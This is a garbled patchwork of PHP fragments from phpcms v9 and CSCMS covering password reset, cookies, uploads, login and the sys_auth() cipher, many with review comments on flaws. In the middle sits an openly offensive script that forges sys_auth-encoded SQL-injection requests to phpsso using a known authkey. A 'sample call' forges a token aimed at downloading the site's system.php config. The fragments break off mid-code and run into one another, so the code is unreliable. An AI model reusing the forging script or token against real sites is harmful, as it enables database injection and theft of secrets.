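    $member_setting = getcache('member_setting');

    if (isset($_POST['dosubmit'])) {
        // Require a captcha in the session and compare as strings. A loose !=
        // also passes when neither side holds a value.
        if (empty($_SESSION['code'])
            || !isset($_POST['code'])
            || !is_string($_POST['code'])
            || (string) $_SESSION['code'] !== strtolower($_POST['code'])
        ) {
            showmessage(L('code_error'), HTTP_REFERER);
        }

        // Only a plain string is looked up; array-shaped input is treated as no match.
        $posted_email = isset($_POST['email']) && is_string($_POST['email']) ? $_POST['email'] : '';
        $memberinfo = $this->db->get_one(array('email' => $posted_email));
        if (!empty($memberinfo['email'])) {
            $email = $memberinfo['email'];
        } else {
            showmessage(L('email_error'), HTTP_REFERER);
        }

        pc_base::load_sys_func('mail');
        $code = sys_auth($memberinfo['userid'] . "\t" . microtime(true), 'ENCODE', get_auth_key('email'));
        $url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}";
        $message = $member_setting['forgetpassword'];
        $message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message);

        // Site name used as the sender label.
        $sitelist = getcache('sitelist', 'commons');
        if (isset($sitelist[$memberinfo['siteid']]['name'])) {
            $sitename = $sitelist[$memberinfo['siteid']]['name'];
        } else {
            $sitename = 'PHPCMS_V9_MAIL';
        }
        sendmail($email, L('forgetpassword'), $message, '', '', $sitename);
        showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login');
    } elseif (!empty($_GET['code'])) {
        $raw_code = is_string($_GET['code']) ? $_GET['code'] : '';
        $code = sys_auth($raw_code, 'DECODE', get_auth_key('email'));
        $code = explode("\t", $code);

        // The link is accepted only within the clock hour it was issued in.
        // 'H' (24-hour) replaces 'h': with the 12-hour form a link matched
        // again twelve hours later on the same day.
        if (is_array($code)
            && isset($code[1])
            && is_numeric($code[0])
            && is_numeric($code[1])
            && date('y-m-d H', SYS_TIME) == date('y-m-d H', (int) $code[1])
        ) {
            $memberinfo = $this->db->get_one(array('userid' => $code[0]));
            if (empty($memberinfo['phpssouid'])) {
                showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login');
            }
            $updateinfo = array();
            // NOTE(review): the strength of this password depends on random(),
            // which is not visible here; confirm it draws from a CSPRNG.
            $password = random(8, "23456789abcdefghkmnrstwxy");
            $updateinfo['password'] = password($password, $memberinfo['encrypt']);
            $this->db->update($updateinfo, array('userid' => $code[0]));
            if (pc_base::load_config('system', 'phpsso')) {
                // Initialise phpsso.
                $this->_init_phpsso();
                // NOTE(review): $email is not assigned yet on this path (it is
                // set two statements later), so an unset value is passed here.
                // Left unchanged because ps_member_edit()'s handling of the
                // e-mail argument is not visible.
                $this->client->ps_member_edit('', $email, '', $password, $memberinfo['phpssouid'], $memberinfo['encrypt']);
            }
            $email = $memberinfo['email'];

            // Site name used as the sender label.
            $sitelist = getcache('sitelist', 'commons');
            if (isset($sitelist[$memberinfo['siteid']]['name'])) {
                $sitename = $sitelist[$memberinfo['siteid']]['name'];
            } else {
                $sitename = 'PHPCMS_V9_MAIL';
            }
            pc_base::load_sys_func('mail');
            // NOTE(review): the new password is mailed in clear and also shown
            // in the response to whoever opened the link.
            sendmail($email, L('forgetpassword'), "New password:" . $password, '', '', $sitename);
            showmessage(L('operation_success') . L('newpassword') . ':' . $password);
        } else {
            showmessage(L('operation_failure'), 'index.php?m=member&c=index&a=login');
        }
    } else {
        $siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1;
        $siteinfo = siteinfo($siteid);
        include template('member', 'forget_password');
    }
}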
<?php /** * Created by 独自等待 * Date: 2015/7/17 * Time: 21:08 * Name: phpcmsv9_authkey_sql.php * 独自等待博客:http://www.waitalone.cn/ */ set_time_limit(0); $wang_url = 'http://localhost/phpcmsv9'; //请修改这里为phpcmsv9网站地址 $auth_key = 'H9zUDnCVcNUvuk9EHIANYHfRvC2W5kAF'; //这里为phpcmsv9 authkey $str = "uid=1" . stripslashes($_GET['id']); $encode = sys_auth($str, 'ENCODE', $auth_key); $content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode); echo $content; function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) { $key_length = 4; $key = md5($key); $fixedkey = hash('md5', $key); $egiskeys = md5(substr($fixedkey, 16, 16)); $runtokey = $key_length ? $operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length) : ''; $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); $i = 0; $result = ''; $string_length = strlen($string); for ($i = 0; $i < $string_length; $i++) {
/**
 * Read a cookie and return it decoded by sys_auth().
 *
 * The cookie name is the configured `cookiepre` prefix (empty when not
 * configured) followed by $key. A missing cookie is decoded as the empty
 * string.
 *
 * @param string $key Cookie name without the prefix.
 * @return mixed The result of sys_auth($value, 'DECODE').
 */
function get_cookie($key)
{
    $settings = C('cookie');

    $prefix = '';
    if (isset($settings['cookiepre'])) {
        $prefix = $settings['cookiepre'];
    }

    $cookie_name = $prefix . $key;

    $raw = '';
    if (isset($_COOKIE[$cookie_name])) {
        $raw = $_COOKIE[$cookie_name];
    }

    // No key argument is passed, so sys_auth() falls back to its own default key.
    return sys_auth($raw, 'DECODE');
}
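/**
 * Attachment upload through swfupload.
 *
 * With `dosubmit` posted, the request is accepted when `swf_auth_key` equals
 * md5(site auth_key . SWFUPLOADSESSID) and the posting group may upload; the
 * file is stored through the attachment class and a comma-separated result
 * line is echoed. Without `dosubmit`, the upload dialog template is rendered.
 */
public function swfupload()
{
    $grouplist = getcache('grouplist', 'member');

    if (isset($_POST['dosubmit'])) {
        $expected_key = md5(pc_base::load_config('system', 'auth_key') . $_POST['SWFUPLOADSESSID']);
        // Strict string comparison: with a loose != two different hex strings
        // that both look like numbers in exponent form compare as equal.
        $key_ok = isset($_POST['swf_auth_key'])
            && is_string($_POST['swf_auth_key'])
            && $_POST['swf_auth_key'] === $expected_key;

        // NOTE(review): isadmin, groupid and userid are read from the POST body.
        // The key above is derived from auth_key and SWFUPLOADSESSID only, so it
        // does not bind those three fields to the request.
        if (!$key_ok || ($_POST['isadmin'] == 0 && !$grouplist[$_POST['groupid']]['allowattachment'])) {
            exit;
        }

        pc_base::load_sys_class('attachment', '', 0);
        $attachment = new attachment($_POST['module'], $_POST['catid'], $_POST['siteid']);
        $attachment->set_userid($_POST['userid']);
        $siteid = get_siteid();
        $site_setting = get_site_setting($siteid);
        // The allowed extension list comes from the site settings.
        $site_allowext = $site_setting['upload_allowext'];
        $aids = $attachment->upload('Filedata', $site_allowext, '', '', array($_POST['thumb_width'], $_POST['thumb_height']), $_POST['watermark_enable']);

        if ($aids[0]) {
            $filename = strtolower(CHARSET) != 'utf-8' ? iconv('gbk', 'utf-8', $attachment->uploadedfiles[0]['filename']) : $attachment->uploadedfiles[0]['filename'];
            if ($attachment->uploadedfiles[0]['isimage']) {
                echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $attachment->uploadedfiles[0]['isimage'] . ',' . $filename;
            } else {
                // Collapse the real extension to the label echoed in the result line.
                $fileext = $attachment->uploadedfiles[0]['fileext'];
                if ($fileext == 'zip' || $fileext == 'rar') {
                    $fileext = 'rar';
                } elseif ($fileext == 'doc' || $fileext == 'docx') {
                    $fileext = 'doc';
                } elseif ($fileext == 'xls' || $fileext == 'xlsx') {
                    $fileext = 'xls';
                } elseif ($fileext == 'ppt' || $fileext == 'pptx') {
                    $fileext = 'ppt';
                } elseif ($fileext == 'flv' || $fileext == 'swf' || $fileext == 'rm' || $fileext == 'rmvb') {
                    $fileext = 'flv';
                } else {
                    $fileext = 'do';
                }
                echo $aids[0] . ',' . $this->upload_url . $attachment->uploadedfiles[0]['filepath'] . ',' . $fileext . ',' . $filename;
            }
            exit;
        } else {
            echo '0,' . $attachment->error();
            exit;
        }
    } else {
        if ($this->isadmin == 0 && !$grouplist[$this->groupid]['allowattachment']) {
            showmessage(L('att_no_permission'));
        }
        $args = $_GET['args'];
        $authkey = $_GET['authkey'];
        if (upload_key($args) != $authkey) {
            showmessage(L('attachment_parameter_error'));
        }
        // NOTE(review): extract() creates local variables from whatever
        // getswfinit() returns for the request's `args`; it can overwrite the
        // locals set above.
        extract(getswfinit($_GET['args']));
        $siteid = $this->get_siteid();
        $site_setting = get_site_setting($siteid);
        $file_size_limit = sizecount($site_setting['upload_maxsize'] * 1024);
        $att_not_used = param::get_cookie('att_json');
        if (empty($att_not_used) || !isset($att_not_used)) {
            $tab_status = ' class="on"';
        }
        if (!empty($att_not_used)) {
            $div_status = ' hidden';
        }
        // List of temporary files that have not been processed yet.
        $att = $this->att_not_used();
        // The user id is handed to the Flash client encoded with sys_auth()'s default key.
        $userid_flash = sys_auth($this->userid, 'ENCODE');
        include $this->admin_tpl('swfupload');
    }
}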
/**
 * Select the view directory for the current request and store it in
 * $this->_ci_view_paths.
 *
 * Without a plugin context the directory is chosen from $dir/$skins and the
 * skin constants; inside a plugin context the plugin's licence value is
 * checked first and the directory comes from the plugin's config/site.php.
 *
 * @param string|null $dir   View group ('user', 'home', ...) or, with
 *                           $plubs == 1, the plugin directory name.
 * @param int         $plubs Plugin mode flag, compared against 0, 1 and 2 below.
 * @param string|null $skins Skin directory used for the 'home' views.
 * @param int         $ulog  When 1 in a HOMEPATH context, the base path
 *                           switches to CSCMS.
 */
public function get_templates($dir = NULL, $plubs = 0, $skins = NULL, $ulog = 0)
{
    // Outside the admin area and the installer, a missing install lock stops the request.
    if (!defined('IS_ADMIN') && strpos(REQUEST_URI, 'index.php/install/') === FALSE && !file_exists(FCPATH . 'packs/install/plub_install.lock')) {
        msg_txt(L('plub_no_instal'), Web_Path . 'admin.php');
    }
    if (!defined('PLUBPATH') && $plubs == 0) {
        // System default view path.
        $path = str_replace("\\", "/", CSCMS);
        if (!$dir) {
            $dirs = 'tpl/skins/' . Web_Skins;
        } else {
            // NOTE(review): $dir and $skins are joined into the path as given;
            // confirm callers never pass request-derived values containing '..'.
            if ($dir == 'user') {
                $dirs = 'tpl/' . $dir . '/' . User_Skins; // default member-centre view
            } elseif ($dir == 'home') {
                if (!empty($skins)) {
                    $dirs = 'tpl/' . $dir . '/' . $skins; // default member-space view
                } else {
                    $dirs = 'tpl/' . $dir . '/' . Home_Skins; // default member-space view
                }
            } else {
                $dirs = 'tpl/' . $dir . '/'; // system back-end view
            }
        }
        if (defined('MOBILE') && Mobile_Is == 1) {
            // Mobile portal view.
            if ($dir == 'user') {
                $dirs = 'tpl/mobile/' . Mobile_Skins . 'user/';
            } elseif ($dir == 'home') {
                $dirs = 'tpl/mobile/' . Mobile_Skins . 'home/';
            } elseif ($dir != 'admin') {
                $dirs = 'tpl/mobile/' . Mobile_Skins;
            }
        }
    } else {
        // Plugin view path.
        $path = str_replace("\\", "/", APPPATH);
        $dir_file = APPPATH . 'config/site.php';
        if ($plubs == 1 && !defined('PLUBPATH')) {
            define('PLUBPATH', $dir);
            $path = FCPATH . 'plugins/' . $dir . '/';
            $dir_file = FCPATH . 'plugins/' . $dir . '/config/site.php';
        }
        // The plugin's stored `ak` value is decoded and must carry an md5 that
        // matches this plugin path, the stored key and host_ym(1).
        $ak = getzd('plugins', 'ak', PLUBPATH, 'dir');
        if (empty($ak)) {
            msg_txt(vsprintf(L('plub_key_err1'), array(PLUBPATH)), Web_Path);
        }
        // NOTE(review): unarraystring() is applied to the decoded value; confirm
        // it does not evaluate or unserialize its input.
        $arrs = unarraystring(sys_auth($ak, 'D'));
        // NOTE(review): the md5 values are compared with a loose !=.
        if ($arrs == '' || empty($arrs['md5']) || md5(PLUBPATH . $arrs['key'] . host_ym(1)) != $arrs['md5']) {
            msg_txt(vsprintf(L('plub_key_err2'), array(PLUBPATH)), Web_Path);
        }
        $dirs = 'tpl/skins/default/';
        if (is_file($dir_file)) {
            // The plugin's site.php is executed and expected to return an array.
            $plub = (require $dir_file);
            if (is_array($plub)) {
                // Back-end view.
                if (defined('IS_ADMIN') && $plubs < 2) {
                    $dirs = 'tpl/admin/';
                // Mobile view.
                } elseif (!defined('IS_ADMIN') && defined('MOBILE') && $plub['Mobile_Is'] == 1) {
                    $dirs = 'tpl/mobile/' . $plub['Mobile_Dir'];
                    if (defined('HOMEPATH')) {
                        $dirs .= 'home/';
                    }
                    if (defined('USERPATH')) {
                        $dirs .= 'user/';
                    }
                // Front-end view.
                } else {
                    if (defined('HOMEPATH')) {
                        if ($ulog == 1) {
                            $path = str_replace("\\", "/", CSCMS);
                        }
                        if (!empty($skins)) {
                            $dirs = 'tpl/home/' . $skins;
                        } else {
                            $dirs = 'tpl/home/' . Home_Skins;
                        }
                    } elseif (defined('USERPATH')) {
                        $dirs = 'tpl/user/' . $plub['User_Dir'];
                    } else {
                        $dirs = 'tpl/skins/' . $plub['Skins_Dir'];
                    }
                }
            }
        }
    }
    // The stored view path always ends with a slash.
    if (substr($dirs, -1) != '/') {
        $dirs .= '/';
    }
    $this->_ci_view_paths = array($path . $dirs => TRUE);
}
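/**
 * Read a cookie that was written by set_cookie.
 *
 * The stored name is the configured `cookie_pre` prefix followed by $var. A
 * present cookie is decoded with sys_auth(); a missing one yields $default.
 * Id-like cookies are then cast to int and name-like cookies are passed
 * through safe_replace().
 *
 * @param string $var     Cookie name without the prefix.
 * @param string $default Value returned when the cookie is not set.
 * @return mixed The decoded (and, for the listed names, filtered) value, or
 *               $default when the cookie is absent.
 */
public static function get_cookie($var, $default = '')
{
    $cookie_name = pc_base::load_config('system', 'cookie_pre') . $var;
    $value = isset($_COOKIE[$cookie_name]) ? sys_auth($_COOKIE[$cookie_name], 'DECODE') : $default;

    // Match on the un-prefixed name. The lists below hold bare names, so
    // comparing the prefixed name skipped both filters whenever a cookie
    // prefix was configured.
    if (in_array($var, array('_userid', 'userid', 'siteid', '_groupid', '_roleid'), true)) {
        $value = intval($value);
    } elseif (in_array($var, array('_username', 'username', '_nickname', 'admin_username', 'sys_lang'), true)) {
        // Names also used by site_model and auth.
        $value = safe_replace($value);
    }

    return $value;
}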
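/**
 * Decide whether the current visitor is logged in and refresh the login state.
 *
 * The identity comes from $key (decoded and unserialized) when given, else
 * from the session. When neither yields an id and login string, the
 * remember-me cookies `user_id` / `user_login` are tried. A successful check
 * updates the user's online/login fields; a failed one clears session and
 * cookies and, when $cid is 0, redirects to the login page.
 *
 * @param int    $cid When 0, a failed check calls msg_url() towards the login page.
 * @param string $key Optional sys_auth()-encoded, serialized array with `id` and `login`.
 * @return bool TRUE when the visitor is logged in.
 */
function User_Login($cid = 0, $key = '')
{
    if (!empty($key)) {
        // NOTE(review): unserialize() runs on a value supplied by the caller.
        // It is only as trustworthy as the sys_auth() key; a JSON payload would
        // avoid object instantiation altogether.
        $key = unserialize(stripslashes(sys_auth($key, 'D')));
        $id = isset($key['id']) ? intval($key['id']) : 0;
        $logstr = isset($key['login']) ? $key['login'] : '';
    } else {
        $id = isset($_SESSION['cscms__id']) ? intval($_SESSION['cscms__id']) : 0;
        $logstr = isset($_SESSION['cscms__login']) ? $_SESSION['cscms__login'] : '';
    }
    $user_id = intval($this->cookie->get_cookie('user_id'));
    $user_login = $this->cookie->get_cookie('user_login');
    $login = FALSE;
    $updata = array();

    if ($id == 0 || empty($logstr)) {
        if ($user_id > 0 && !empty($user_login)) {
            // Reject a malformed cookie. This used to assign to a misspelled
            // variable, so the malformed value was still compared below.
            if (!preg_match('/^[0-9a-zA-Z]*$/', $user_login)) {
                $user_login = '';
            }
            // $user_id is an integer at this point (intval above).
            $row = $this->db->query("SELECT id,name,code,pass,lognum,level,jinyan,cion,vip,logtime,viptime FROM " . CS_SqlPrefix . "user where id=" . $user_id . "")->row();
            if ($row) {
                // Check that the cookie matches the account's name, password and code.
                if (md5($row->name . $row->pass . $row->code) === (string) $user_login) {
                    // Daily login bonus.
                    if (User_Cion_Log > 0 && date("Y-m-d", $row->logtime) != date('Y-m-d')) {
                        $updata['cion'] = $row->cion + User_Cion_Log;
                    }
                    // VIP expiry. The expiry time is read from the row; the
                    // previous code tested an undefined variable, which reset
                    // VIP status on every cookie login.
                    if ($row->vip > 0 && $row->viptime < time()) {
                        $updata['vip'] = 0;
                        $updata['viptime'] = 0;
                    }
                    // Level check.
                    $level = getlevel($row->jinyan);
                    if ($level > $row->level) {
                        $updata['level'] = $level;
                        // Send the level-up notice.
                        $notice = array();
                        $notice['uida'] = $row->id;
                        $notice['uidb'] = 0;
                        $notice['name'] = '用户等级升级通知';
                        $notice['neir'] = '恭喜您,您的用户等级升级到Lv' . $level;
                        $notice['addtime'] = time();
                        $this->CsdjDB->get_insert('msg', $notice);
                    }
                    // Update the login bookkeeping.
                    $updata['zx'] = 1;
                    $updata['lognum'] = $row->lognum + 1;
                    $updata['logtime'] = time();
                    $updata['logip'] = getip();
                    $updata['logms'] = time();
                    $this->CsdjDB->get_update('user', $user_id, $updata);
                    // Login log, once per day. A fresh array is used so the
                    // notice fields above do not end up in the log insert.
                    if (date("Y-m-d", $row->logtime) != date('Y-m-d')) {
                        $this->load->library('user_agent');
                        $agent = ($this->agent->is_mobile() ? $this->agent->mobile() : $this->agent->platform()) . ' / ' . $this->agent->browser() . ' v' . $this->agent->version();
                        $log_entry = array();
                        $log_entry['uid'] = $row->id;
                        $log_entry['loginip'] = getip();
                        $log_entry['logintime'] = time();
                        $log_entry['useragent'] = $agent;
                        $this->CsdjDB->get_insert('user_log', $log_entry);
                    }
                    $_SESSION['cscms__id'] = $row->id;
                    $_SESSION['cscms__name'] = $row->name;
                    $_SESSION['cscms__login'] = md5($row->name . $row->pass);
                    $login = TRUE;
                }
            }
        }
    } else {
        // $id is an integer at this point (intval above).
        $row = $this->db->query("SELECT id,name,pass,level,jinyan FROM " . CS_SqlPrefix . "user where id='{$id}'")->row();
        if ($row) {
            if (md5($row->name . $row->pass) === (string) $logstr) {
                $login = TRUE;
                // Level check.
                $level = getlevel($row->jinyan);
                if ($level > $row->level) {
                    $updata['level'] = $level;
                    // Send the level-up notice.
                    $notice = array();
                    $notice['uida'] = $row->id;
                    $notice['uidb'] = 0;
                    $notice['name'] = '用户等级升级通知';
                    $notice['neir'] = '恭喜您,您的用户等级升级到Lv' . $level;
                    $notice['addtime'] = time();
                    $this->CsdjDB->get_insert('msg', $notice);
                }
                // Refresh the online timestamp.
                $updata['zx'] = 1;
                $updata['logms'] = time();
                $this->CsdjDB->get_update('user', $id, $updata);
            }
        }
    }

    if (!$login) {
        // Clear an invalid login from the session.
        unset($_SESSION['cscms__id'], $_SESSION['cscms__name'], $_SESSION['cscms__login']);
        // Clear the remember-me cookies.
        $this->cookie->set_cookie("user_id");
        $this->cookie->set_cookie("user_login");
        if ($cid == 0) {
            msg_url('您还没有登录或者登录已超时~!', userurl(site_url('user/login')));
        }
    } else {
        // Daily per-member reset, keyed on the day stored in the cache file.
        $day = @file_get_contents(FCPATH . "cache/cscms_time/day.txt");
        if (date('d') != $day) {
            // Reset the daily share/publish counter.
            $uedit['addhits'] = 0;
            $this->CsdjDB->get_update('user', $_SESSION['cscms__id'], $uedit);
            write_file(FCPATH . "cache/cscms_time/day.txt", date('d'));
        }
    }
    return $login;
}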
/**
 * Set, read or delete a cookie.
 *
 * - $name === null: delete every cookie whose name starts with $value (or with
 *   the configured prefix when $value is empty).
 * - $value === '': return the cookie decoded by sys_auth(), or null when absent.
 * - $value === null: delete the cookie.
 * - otherwise: store sys_auth($value) under the prefixed name.
 *
 * @author liu21st <*****@*****.**>
 * @lastmodify 2013-01-22 16:49:32 by mrmsl
 *
 * @param string $name   Cookie name without the prefix, or null for bulk delete.
 * @param string $value  Value to store; defaults to ''.
 * @param array  $option Overrides for prefix/expire/path/domain. A number is
 *                       taken as the expiry, a string is parsed as a query
 *                       string. Defaults to null.
 *
 * @return mixed The decoded value when reading; null otherwise.
 */
function cookie($name, $value = '', $option = null)
{
    $settings = array(
        'prefix' => COOKIE_PREFIX,
        'expire' => COOKIE_EXPIRE,
        'path' => COOKIE_PATH,
        'domain' => COOKIE_DOMAIN,
    );

    // Caller-supplied options override the defaults.
    if (!empty($option)) {
        if (is_numeric($option)) {
            $option = array('expire' => $option);
        } elseif (is_string($option)) {
            parse_str($option, $option);
        }
        $settings = array_merge($settings, array_change_key_case($option));
    }

    // Bulk delete by prefix.
    if (is_null($name)) {
        if (empty($_COOKIE)) {
            return;
        }
        // Prefix to delete; falls back to the configured one.
        $wanted_prefix = empty($value) ? $settings['prefix'] : $value;
        if (empty($wanted_prefix)) {
            // An empty prefix is ignored rather than matching every cookie.
            return;
        }
        foreach ($_COOKIE as $key => $val) {
            if (stripos($key, $wanted_prefix) === 0) {
                setcookie($key, '', time() - 3600, $settings['path'], $settings['domain']);
                unset($_COOKIE[$key]);
            }
        }
        return;
    }

    $full_name = $settings['prefix'] . $name;

    // Read.
    if ('' === $value) {
        if (isset($_COOKIE[$full_name])) {
            return sys_auth($_COOKIE[$full_name], false);
        }
        return null;
    }

    // Delete.
    if (is_null($value)) {
        setcookie($full_name, '', time() - 3600, $settings['path'], $settings['domain']);
        unset($_COOKIE[$full_name]);
        return;
    }

    // Set. The browser receives the encoded value; the in-request copy in
    // $_COOKIE holds the plain one.
    $expires_at = 0;
    if (!empty($settings['expire'])) {
        $expires_at = time() + intval($settings['expire']);
    }
    setcookie($full_name, sys_auth($value), $expires_at, $settings['path'], $settings['domain']);
    $_COOKIE[$full_name] = $value;
}
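/**
 * Ask a registered application whether it is reachable and echo its answer.
 *
 * Reads the application id from $_GET['appid'], looks the application up in
 * the cached application list, sends it an encoded "action=check_status"
 * request and terminates the script with the response body, or with '0' on
 * any failure.
 */
public function check_status()
{
    $appid = isset($_GET['appid']) ? intval($_GET['appid']) : 0;
    if (!$appid) {
        exit('0');
    }

    $applist = getcache('applist');
    if (empty($applist)) {
        // Rebuild the application list cache.
        $applist = $this->db->listinfo('', '', 1, 100, 'appid');
        setcache('applist', $applist);
    }

    // Reject ids that are not in the list: indexing a missing entry would
    // yield an empty auth key and an empty URL further down.
    if (empty($applist) || !isset($applist[$appid])) {
        exit('0');
    }
    $app = $applist[$appid];

    $param = sys_auth('action=check_status', 'ENCODE', $app['authkey']);

    // When an IP is configured it is used as the endpoint; this can misroute
    // when several virtual hosts share that IP.
    // NOTE(review): the IP form is always plain http:// - confirm that is acceptable.
    $appurl = !empty($app['ip']) ? 'http://' . $app['ip'] . '/api/' : $app['url'];
    $url = $appurl . $app['apifilename'];
    $url .= (strpos($url, '?') !== false) ? '&' : '?';

    $data = @file_get_contents($url . 'code=' . urlencode($param));

    exit($data ? $data : '0');
}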
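<?php

/**
 * Encode or decode a string with a key-derived XOR stream.
 *
 * ENCODE output is a 4-character per-call prefix followed by unpadded base64
 * of: a 10-digit expiry timestamp (0 = never), a 16-hex-character MD5 check
 * value, and the payload, all XORed with a 32-character key stream that
 * repeats. DECODE reverses this and returns '' when the token is malformed,
 * expired, or fails the check value.
 *
 * NOTE(review): the key stream repeats every 32 bytes and the per-call prefix
 * is 4 hex characters taken from md5(microtime()), so this construction
 * should not be relied on for new designs; it is kept as-is here so existing
 * tokens stay readable.
 *
 * @param string $string    Plain text (ENCODE) or token (any other operation)
 * @param string $operation 'ENCODE' to encode; any other value decodes
 * @param string $key       Secret key; when empty the system auth_key is loaded
 * @param int    $expiry    Lifetime in seconds, 0 for no expiry
 * @return string Token, decoded payload, or '' on failed verification
 */
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
    $key_length = 4;
    $encoding = ($operation == 'ENCODE');

    $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));
    $fixedkey = md5($key);
    $egiskeys = md5(substr($fixedkey, 16, 16));

    // Per-call prefix: generated when encoding, read back from the token when decoding.
    if (!$key_length) {
        $runtokey = '';
    } elseif ($encoding) {
        $runtokey = substr(md5((string) microtime(true)), -$key_length);
    } else {
        $runtokey = (string) substr($string, 0, $key_length);
    }

    $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

    if ($encoding) {
        $string = sprintf('%010d', $expiry ? $expiry + time() : 0)
            . substr(md5($string . $egiskeys), 0, 16)
            . $string;
    } else {
        $string = (string) base64_decode((string) substr($string, $key_length));
    }

    $result = '';
    $string_length = strlen($string);
    for ($i = 0; $i < $string_length; $i++) {
        $result .= chr(ord($string[$i]) ^ ord($keys[$i % 32]));
    }

    if ($encoding) {
        return $runtokey . str_replace('=', '', base64_encode($result));
    }

    // Decoding: the header must be exactly 10 digits + 16 check characters.
    // Validating the digits first avoids arithmetic on arbitrary bytes, which
    // a wrong key or a tampered token would otherwise produce.
    $expires = (string) substr($result, 0, 10);
    if (strlen($result) < 26 || !preg_match('/\A[0-9]{10}\z/', $expires)) {
        return '';
    }
    $expires = (int) $expires;
    if ($expires !== 0 && $expires <= time()) {
        return '';
    }

    $payload = (string) substr($result, 26);
    $given = substr($result, 10, 16);
    $expected = substr(md5($payload . $egiskeys), 0, 16);

    // Compare the check value as exact strings (never with ==, which treats
    // numeric-looking strings as numbers); constant-time when available.
    $matches = function_exists('hash_equals') ? hash_equals($expected, $given) : ($expected === $given);

    return $matches ? $payload : '';
}

// Sample call: encodes a query-string style payload with an explicit key and
// prints the token. Whoever holds the key can produce tokens with any field
// values, so code that decodes such tokens still has to validate each field.
echo sys_auth('i=3&d=1&t=9999999999&ip=115.238.245.179&m=3&modelid=3&s=caches/configs/system.p&f=hp', 'ENCODE', '8fafb9a1932b309d809e6140772c661');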
} //执行本系统登陆操作 $userid = $userinfo['userid']; $groupid = $userinfo['groupid']; $username = $userinfo['username']; $password = $userinfo['password']; $nickname = $userinfo['nickname']; $db->update(array('lastip' => ip(), 'lastdate' => SYS_TIME), array('userid' => $userid)); pc_base::load_sys_class('param', '', 0); if (!$cookietime) { $get_cookietime = param::get_cookie('cookietime'); } $_cookietime = $cookietime ? intval($cookietime) : ($get_cookietime ? $get_cookietime : 0); $cookietime = $_cookietime ? TIME + $_cookietime : 0; $phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']); $phpcms_auth = sys_auth($userid . "\t" . $password, 'ENCODE', $phpcms_auth_key); header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); param::set_cookie('auth', $phpcms_auth, $cookietime); param::set_cookie('_userid', $userid, $cookietime); param::set_cookie('_username', $username, $cookietime); param::set_cookie('_nickname', $nickname, $cookietime); param::set_cookie('_groupid', $groupid, $cookietime); param::set_cookie('cookietime', $_cookietime, $cookietime); exit('1'); } /** * 同步退出 */ if ($action == 'synlogout') { header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); pc_base::load_sys_class('param', '', 0);
/**
 * Read a cookie that was written through set_cookie.
 *
 * The configured cookie prefix is prepended to the name and the stored value
 * is passed through sys_auth(..., 'DECODE') before it is returned.
 *
 * @param string $var     Cookie name without the prefix
 * @param string $default Value returned when the cookie is not present
 * @return mixed Decoded cookie value, or $default when the cookie is not set
 */
public static function get_cookie($var, $default = '')
{
    $cookie_name = pc_base::load_config('system', 'cookie_pre') . $var;

    if (!isset($_COOKIE[$cookie_name])) {
        return $default;
    }

    return sys_auth($_COOKIE[$cookie_name], 'DECODE');
}
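/**
 * Password recovery through a code sent by SMS.
 *
 * On submit: checks the captcha, checks that the two password fields match,
 * looks up an SMS report row for the submitted mobile number and code,
 * updates the password, optionally syncs to phpsso, then sends a
 * recovery e-mail containing an encoded link. Without a submit it renders
 * the forget_password_mobile template.
 */
public function public_forget_password_mobile()
{
    $email_config = getcache('common', 'commons');
    $this->_session_start();
    $member_setting = getcache('member_setting');

    if (isset($_POST['dosubmit'])) {
        // Handle the submitted request; the mobile number is authoritative.
        // An absent session code must not compare equal to an empty submitted code.
        if (empty($_SESSION['code']) || $_SESSION['code'] != strtolower($_POST['code'])) {
            showmessage(L('code_error'), HTTP_REFERER);
        }

        $mobile = $_POST['mobile'];
        $mobile_verify = intval($_POST['mobile_verify']);
        $password = $_POST['password'];
        $pwdconfirm = $_POST['pwdconfirm'];
        if ($password != $pwdconfirm) {
            showmessage(L('passwords_not_match'), HTTP_REFERER);
        }

        // Check that the mobile number and the submitted SMS code belong together.
        // The lookup must be keyed on both columns; the earlier `"mobile" > $mobile`
        // was a comparison, so the mobile number never reached the query.
        $sms_report_db = pc_base::load_model('sms_report_model');
        $sms_report_array = $sms_report_db->get_one(array('mobile' => $mobile, 'in_code' => $mobile_verify));
        if (empty($sms_report_array)) {
            showmessage("手机和验证码不对应,请通过正常渠道修改密码!", HTTP_REFERER);
        }

        // Update the password.
        // NOTE(review): the row updated is $this->memberinfo['userid'], not an
        // account looked up from $mobile - confirm this is the intended account.
        // NOTE(review): $password is written as submitted; no hashing is visible
        // in this method - confirm the model layer handles it.
        $updateinfo = array();
        $updateinfo['password'] = $password;
        $this->db->update($updateinfo, array('userid' => $this->memberinfo['userid']));

        if (pc_base::load_config('system', 'phpsso')) {
            // Initialise phpsso.
            $this->_init_phpsso();
            // NOTE(review): $email is not assigned until further down, and the
            // password arguments come from $_POST['info'], not from $password.
            $res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
        }

        $memberinfo = $this->db->get_one(array('email' => $_POST['email']));
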